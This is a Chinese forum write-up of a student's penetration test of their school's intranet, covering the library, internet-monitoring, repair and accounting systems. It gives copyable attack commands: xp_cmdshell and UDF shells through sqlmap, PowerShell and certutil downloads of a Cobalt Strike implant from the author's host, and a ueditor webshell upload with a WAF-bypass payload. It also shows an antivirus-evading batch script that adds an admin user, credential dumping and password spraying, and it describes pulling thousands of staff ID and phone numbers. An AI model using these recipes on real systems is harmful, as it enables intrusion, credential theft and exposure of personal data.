实战 | 对自己学校内网的渗透测试

### **一、图书馆管理系统** #### 1.1 SQL注入开启xp\_cmdshell 1.1.1 首先是图书馆管理系统,这个系统是开在公网的。目录扫描发现Web Api Help接口文档泄露。我们拼接上图的第二个接口,发现在szReaderID参数处传入单数个单引号,就会报错;传入双数个单引号,就会回显操作成功。证明很可能存在注入。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-f4eaadd7ae6cf3c4dccd242fbcb4401f36a105b4.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-348f6cc2e10cd912fd0ef4568f8fdc7335dc558b.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-5508bb64e48ca0d3525845053e4b80e95ca2f9b3.png) 1.1.2 sqlmap跑一下。因为是sql server,所以可以直接--os-shell开启xp\_cmdshell来命令执行。当前的权限还很低,为了进一步提权,得上个CS马。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-01be28db5bc975f1e7d9933eb87e7b78259bc403.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-85647a9cecda63e7a522d4272d95ec342a74c44a.png) #### **1.2 尝试远程下载上线CS** 1.2.1 以下是一些常用的远程下载命令 `certutil -urlcache -split -f http://127.0.0.1:8080/nc.txt c:\\nc.txt  //certutil下载文件` `bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\\Pstools.zip  //bitsadmin下载文件` `powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/nc.txt','nc.exe') //powershell下载文件` `cmd /c start /min msedge.exe http://127.0.0.1/test.zip && timeout 5 && taskkill /f /t /im msedge.exe && C:/Users/%UserName%/Downloads/test.zip  //msedge下载并执行` 1.2.2 tasklist /svc 看一下,发现有defender,那么我们就可以做个免杀CS马传上去。先在本地开启一个python的http服务,把马放在上面,再在sqlmap上让目标服务器执行 `powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://xxx.xxx.xxx.xx:8000/360safe.exe','c:\\programdata\\360safe.exe') `, 把马360safe.exe远程下载到他C盘的programdata目录下。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fdbb08651bda881f010fe9580160c0f9c55b3d84.png) 1.2.3 成功地传上了马,但执行木马时,却发现无法执行。后面又尝试把马放到其他几个目录执行,也还是不行。可能是权限问题。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-087395c6b737afc2425a2fc78f9af0d10696786e.png) #### **1.3 找网站根目录写shell** 1.3.1 那就写aspx的webshell到网站里吧。这里存放js的目录也是可以解析aspx的,我们可以执行命令全局搜索目标系统的js文件。 `Dir /s /b D:\\app.a1cccec9.js` 得知其该系统存放JS的目录是D:\\\\disttsg\\dist\\js 。这时我们就可以让目标服务器抓取webshell了。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-23ffc3071afe88fd818df021fe6ada737f8e500d.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-2a17493e6ddf5164746dc1295e241500d3641800.png) 1.3.2 先去浏览器访问一下shell,显示是存在的而且已经成功解析。可刚连接成功就变成404了。我心想之前没见过defender杀冰蝎马啊,感觉是有安全设备作怪。 于是乎又用了哥斯拉不同加密方式的马,全都是刚连上就没了。正在我一筹莫展的时候,朋友提醒我可以尝试改一下冰蝎的默认密码。结果传上去再连真就不被杀了。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-ef014f5bd6559f9b4e8be38e4df6e00da7e6b803.png) #### **1.4 成功上线CS提权** 1.4.1 在冰蝎的“命令执行”模块下,执行命令时回显拒绝访问。但在“虚拟终端”模块下可以正常执行。信息收集了一下发现没有域,属于工作组。于是再把CS马丢上去执行。这里终于成功上线了。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-992d9798a002f59272c710acbcae8a7c41f7f7a0.png) 1.4.2 是台win10,CS直接getsystem。得到system令牌后直接抓hash还是会失败。于是可以使用巨龙拉冬插件的“本地提权”下的“System2Admin”功能。利用伪造的system权限,反弹一个管理员权限的会话回来。用这个管理员权限的会话就可以抓密码的哈希值啦。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-cdf09645418e490c38cb031cf64cfa0823961768.png) #### **1.5 拿到大量数据和权限** 1.5.1 去cmd5解出了密码 ,再用超级弱口令爆破工具喷洒一下B段,发现三台服务器都是这个密码。那直接去远程连接。用windows的mstsc连接的时候会报错,我不记得具体报错是什么了,总之后面是去kali连的。kali自带的远程连接工具有xfreerdp和rdesktop,我比较喜欢前者。 `xfreerdp /u:Administrator /p:Password123 /v:xxx.xxx.xxx.xxx /size:80%` ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-7eccddf993bcc6b495ba75e695eca5d770d51486.png) 1.5.2 在其中一台服务器的桌面上发现了一个神秘的文本文档,打开以后发现明显是一串密码。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fca0038a547f09d4a987b11c69b6c9181a163719.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-6b64a6ae87ca8445346ee1ab95dabb3b07611bc9.png) 1.5.3 用上面的密码尝试登录这台服务器上面运行的WEB系统,果不其然登录成功,拿下全校教室电源和多媒体控制权。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-41e979e76a7ef61d0d42827f447cc84d2f368ea5.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-afbe4b6e8ab122ee21205daa75f19c6e4bcc0a57.png) 1.5.4 关杀软后把searchall丢到服务器上,收集一下敏感文件以及浏览器缓存的信息。这里从浏览器缓存中得到了服务器管理员的校园网账号密码。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c711a0fb7890674a80ea5400623bbbeac9290bb3.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-43cc21c630b948be1d22f86b7f102f4e63cf823c.png) 工具链接: <https://github.com/Naturehi666/searchall> 1.5.5 第二台机器是win2008server,上面宝塔面板搭建的网站早已废弃,也没啥敏感信息。在第三台win10中同样找到了一些web的密码,成功登录我们学院的教学实训平台管理端。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-ff96ceda95ff7b2404a02f48bf246cb2a22ae6e8.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-785103b37d434468088203a5831222152f0b6861.png) 1.5.6 丢CS马到第三台服务器上,用CS插件收集navicat和xshell的缓存密码,拿下2个mysql数据库和4台linux主机。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-421b464f7d85f99add77f88c3b30b0fb3f912547.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-b5b6659e93a470ef65dd3919097fc3b61c18603e.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-247c27246447660d87673c835f560d1a82cab8fc.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-896643487e03c3f08c48aafbca57c3934cbf62eb.png) ### **二、违规联网检测系统** #### **2.1 接口未授权得到管理员密码** 2.1.1 开局经典登录框,登陆包的密码被加密了不好爆破。这种vue.js框架的系统可以多去找一下js接口未授权,经过一番测试,发现/api/v1/system/user接口泄露了管理员密码。这里忘记截图了。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-7e1bc50cec4ea498a4ea3eef0eab241a7d71a586.png) 2.1.2 进去发现这个系统记录着全校学生的“科学上网”记录,以及访问违法网站、境外网站的详细记录(难绷)。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-e03a34ea66cbc35b99fe903ca3808ddff1516a67.png) #### **2.2 sql注入到udf提权** 2.2.1 挂上burpsuite的被动插件xiasql在后台东点西点,很快发现 /api/v1/toolAct/findAgg?orderBy= 这里存在注入。而且这个接口也是未授权,不登录也能直接访问,所以可以把url直接丢sqlmap跑。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-14225b031a919ae9ece53a72fabcb8b46655a984.png) 2.2.2 拿到密码的哈希后,请了有cmd5会员的同学帮我解,然后直接navicat连接。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-6ed286577f37f839ab893e80b6e17bcbef8b6854.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-605950dfad1c7f728c90f4e51e87075fb1061b06.png) 2.2.3 如上图所示, `show variables like 'secure_file_priv'`,发现输出为空,证明这个数据库有任意目录读写的权限。`show variables like '%version_%'`,得知服务器是32位的windows。 那么就可以使用`sqlmap -d "mysql://root:密码@xxx.xxx.xxx.xxx:3306/mysql" --random-agent --os-shell` 尝试UDF提权。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-db20f991e5b8ffdf02b8a32eca9ccc94c9d80cb9.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-1aaf341b9a6352f7e1c3dfb0a7c4d743f11d67d4.png) #### **2.3 绕过火绒添加用户** 2.3.1 提权成功,有了system权限,可以尝试添加用户远程连接。 `net user newuser password123 /add` `net localgroup administrators newuser /add` 但添加用户时又回显超时,想起来应该是有杀软在拦截命令行添加用户。一看果不其然,有火绒。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-b030e9ead053e3b0e35bfeb15fcd9e60884e5993.png) 2.3.2 可以使用如下方法绕过火绒添加用户。我们可以编写一个.bat命令批处理脚本,内容如下: `copy c:\windows\system32\net1.exe d:\update.exe` `d:\update.exe  user newuser password123 /ad` `net localgroup administrators newuser /ad` ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-16bdbcfed1ea862ae74a54bf187e397a82c12b46.png) 意为将net1.exe复制到D盘并重命名为update.exe,用这个update.exe来新增用户。这里注意不能用net.exe,会被拦截,用net1.exe才行。/add可以用/ad替代。若将这里的update.exe 放在C盘的目录也不能成功执行,本地测试仍会被火绒拦,如下图所示。所以最好将其添加到非系统盘。(最后要记得删除) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-6a10a503d192d03e28057cf6cc4ed05b8cd6de91.png) 2.3.3 执行命令,让服务器抓取我们的脚本,然后执行。这里一定不能用certutil命令下载,火绒会拦截。 `powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://xxx.xxx.xxx.xxx:8000/1.bat','d:\1.bat')` 最后也是很顺利地绕过火绒添加了用户,远程连接成功。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-f4dd1ac328b2e1445fd757718f37f3a421e1bd84.png) 2.3.4 searchall收集了一批密码,上面有些web已经没了,剩下的登上去也没有什么东西。mimikatz抓了本机密码,可惜也没喷洒出相同密码的服务器。(下图厚码保命) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a544ce37891cd192013abe950500ee1406d3a4fe.png) 2.3.5 这台服务器的9200端口还有Elastic未授权,可以用ElasticHD进行可视化管理。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-942f301548e327d9c51062e1740e094f55cc7c5a.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-dc29af6c1549f974a563c916a9b6b9d97585a00a.png) 工具链接: <https://github.com/qax-os/ElasticHD> ### **三、网络报修登记系统** #### **3.1 注入得到全校教师SFZ号** 3.1.1 下面去看看这个报修系统。路径一删发现目录遍历,但未授权访问进去的页面都静态的,点击不了功能点。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-1785e608ba9052be71189092502a6730be367227.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-04ce6baf70820f20e781a1c9a693a6f9826ff9db.png) 3.1.2 但在未授权访问的页面里,用findsomething插件发现了/api/getPageData.php这个路径,拼接发现可以正常回显报修信息。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-073221d38d0e9086412d5c70205b4045f401adb9.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c9bc45dcb8e806b68612bcde13cf3023e708a9eb.png) 3.1.3 像这种回显json格式数据的路径一般都有传参的。fuzz一下常见参数,如id、date、page等,发现通通没有。上个参数字典爆破一下,最后发现有filter这个参数。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-d7c48c44c768193cc43be33fe7d56c668a2de0dc.png) 3.1.4 加单引号报错,直接上sqlmap。一番查找后从某表中dump出了全校教职工的身份证号和手机号,共有几千条。可惜不能堆叠查询,password也解不出。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-b5f8ffd743c8d41a48008e7519718f6210a0ce11.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-aa48e35833828a28fbf9a3a11343c84018079e68.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-8b3f23390e828ac78ce0535da375fd9da3686082.png) #### **3.2 accesskey和accessecret泄露** 3.2.1 扫下目录,发现了/controller/ ,打开又是同样的目录遍历。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-b30785ab99013726ec6f6db911484290ea5686ad.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a0b96e06f6a954fa1df2f1bfaae033bc8bae72ca.png) 3.2.2 在reset\_HT\_ETL\_log.py 发现数据库密码,以及阿里云的accesskey,accessecret泄露。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-6716794ca897ea452ca28e8b928c1f4e9b83d9e7.png) 3.2.3 满怀期待地去ossbrowser登录,点进去却发现云资产空空如也,并没有实例。得到了数据库密码,但数据库端口没有开放。扫了一下全端口也没有发现,于是没能往下继续。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-05d749f1f55ae2e33dee90e0b0fc12b14d29fb0d.png) 工具链接: <https://github.com/aliyun/oss-browser> ### **四、会计实训系统** #### **4.1 .net ueditor 文件上传** 4.1.1 下面是一个会计实训系统,目录扫描发现了.net的ueditor。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-513f267b6874c9301e673ae9c4d465913b49b349.png) 4.1.2 这里的漏洞利用不需要构造html上传页面,可以使用较为简单的方法上马。我们可以在VPS开启一个http服务,将冰蝎马的后缀由aspx改成jpg,即security.jpg。然后将图片马投放到http服务器上。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-6609ead719127d326a42fc2a1145573c528e8afd.png) 4.1.3 我们再用火狐插件hackbar发送post请求,post请求体为`source[]=http://xxx.xxx.xxx.xxx/security.jpg?.aspx`。 这里发送后会直接被WAF重置连接。我们可以改成`source[]=http://xxx.xxx.xxx.xxx/security.jpg?.a?s?p?x` 绕过WAF,让目标抓取我们http服务器上的图片马并解析。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-f8473ee5dc5aee7d444c648ab70903557421ebb6.png) 4.1.4 连上冰蝎后丢免杀CS马进去,上线成功但无法提权。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-b5974faa7e884353b3bfe705476b1ea7fb6d5698.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-9371fe536e5517da213908907ff7745f604daa3d.png) ### **五、剩下的一些其他成果** #### **5.1 简单的文件上传** 5.1.1 简单的前端验证,禁用JS上马。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-5d25a12a45f9ff8fdc4eeea92be68e276b30ab4c.png) 5.1.2 该服务器不出网,也ping不通我连着校园网的主机。搞个MSF的正向马,做一下免杀上线MSF。其上面有360全家桶和我第一次见的诺顿杀毒,令牌没有高权限的,一提权马就被杀,最后没能提权。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-3f37f1a416f47d357ed484e48cb3de8871124ef1.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-8f6cc1fbe5413bda3cab7f550a6fadfb13688a8a.png) #### **5.2 网络设备RCE 写马** 5.2.1 某网络设备ping功能点存在RCE,找到根目录后手工写马拿了一台。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4255166825ca1d0666ccd5ee0859af60b4c1c524.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-bb1d4d44c1ac0bf79a2123127c43eec0db72c334.png) #### **5.3 Shiro一把梭** ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a6c178e8cd61b25f52d941ef1ef7e9e202ae8d88.png) ### **六、后续** 6.1 最后再把那些弱口令、未授权、任意文件下载、XSS之类的小洞整合一下,硬是整出了127页的渗透报告。整理好后发给了老师,结果这回复是我没想到的。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4e185dd220d5d04ffa61a78bfb1b81ef0646d553.png) 6.2 难绷。掉小珍珠了。 ![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-8a9d691ed5147b34fb6a047fa7757b401c5c6e90.png)
原始链接: https://forum.butian.net/share/3671
侵权请联系站方: [email protected]

相关推荐

换一批